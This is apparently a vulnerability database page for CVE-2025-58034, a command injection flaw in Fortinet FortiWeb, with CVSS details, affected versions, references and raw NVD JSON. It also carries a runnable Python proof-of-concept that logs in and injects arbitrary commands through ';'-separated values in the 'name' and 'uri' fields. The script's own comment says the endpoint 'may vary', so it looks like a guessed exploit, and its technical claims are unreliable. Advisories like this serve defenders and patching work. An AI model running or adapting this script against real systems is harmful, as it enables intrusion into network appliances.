Security Vulnerability Report
CVE-2025-58034 CVSS 7.2 HIGH

CVE-2025-58034

Published: 2025-11-18 17:16:05
Last Modified: 2025-11-21 18:27:43

Description

An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, and FortiWeb 7.0.0 through 7.0.11 may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* (FortiWeb 8.0.0 - 8.0.1) - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* (FortiWeb 7.6.0 - 7.6.5) - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* (FortiWeb 7.4.0 - 7.4.10) - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* (FortiWeb 7.2.0 - 7.2.11) - VULNERABLE
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* (FortiWeb 7.0.0 - 7.0.11) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-58034 PoC - FortiWeb OS Command Injection
# Note: Requires authenticated high-privilege access


def exploit_fortiweb(target_url, username, password, command):
    """
    Exploit OS command injection in FortiWeb management interface
    """
    # Login to FortiWeb
    login_url = f"{target_url}/api/v1/login"
    login_data = {
        "username": username,
        "password": password
    }

    session = requests.Session()

    try:
        # Attempt login
        response = session.post(login_url, json=login_data, verify=False, timeout=10)

        if response.status_code != 200:
            print(f"[-] Login failed: {response.status_code}")
            return False

        # Inject OS command via crafted HTTP request
        # The vulnerable endpoint may vary based on FortiWeb version
        inject_url = f"{target_url}/api/v1/cmdb/system/alert-email-setting"

        # Payload: inject command using command separators
        payload = {
            "name": f"test;{command};#",
            "uri": f"http://example.com;{command}"
        }

        response = session.post(inject_url, json=payload, verify=False, timeout=10)

        if response.status_code in [200, 201, 500]:
            print(f"[+] Command injection attempt sent: {command}")
            print(f"[+] Response: {response.text}")
            return True
        else:
            print(f"[-] Request failed: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-58034.py <target_url> <username> <password> <command>")
        print("Example: python cve-2025-58034.py https://fortiweb.local admin password 'id'")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    cmd = sys.argv[4]

    exploit_fortiweb(target, user, pwd, cmd)
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-513 (Vendor Advisory)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58034 (US Government Resource)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-58034",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T17:16:05.057",
    "lastModified": "2025-11-21T18:27:43.280",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "cisaExploitAdd": "2025-11-18",
    "cisaActionDue": "2025-11-25",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "Fortinet FortiWeb OS Command Injection Vulnerability",
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-78"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.0.0",
                "versionEndExcluding": "7.0.12",
                "matchCriteriaId": "CDE13E2A-CEC3-4FC7-98AD-11CA1EAEC0C0"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.2.0",
                "versionEndExcluding": "7.2.12",
                "matchCriteriaId": "551127B2-DCE9-403D-8073-ACD717CD0B19"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.4.0",
                "versionEndExcluding": "7.4.11",
                "matchCriteriaId": "F43B659D-6EA7-46F5-9778-0FD0FD036AA9"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.6.0",
                "versionEndExcluding": "7.6.6",
                "matchCriteriaId": "1E5D27F6-0659-4D98-9585-FD84B433CCB5"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.0.2",
                "matchCriteriaId": "F1DD8ABA-9BB5-4ED8-9E34-1CB0752651DF"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-513",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58034",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["US Government Resource"]
      }
    ]
  }
}
```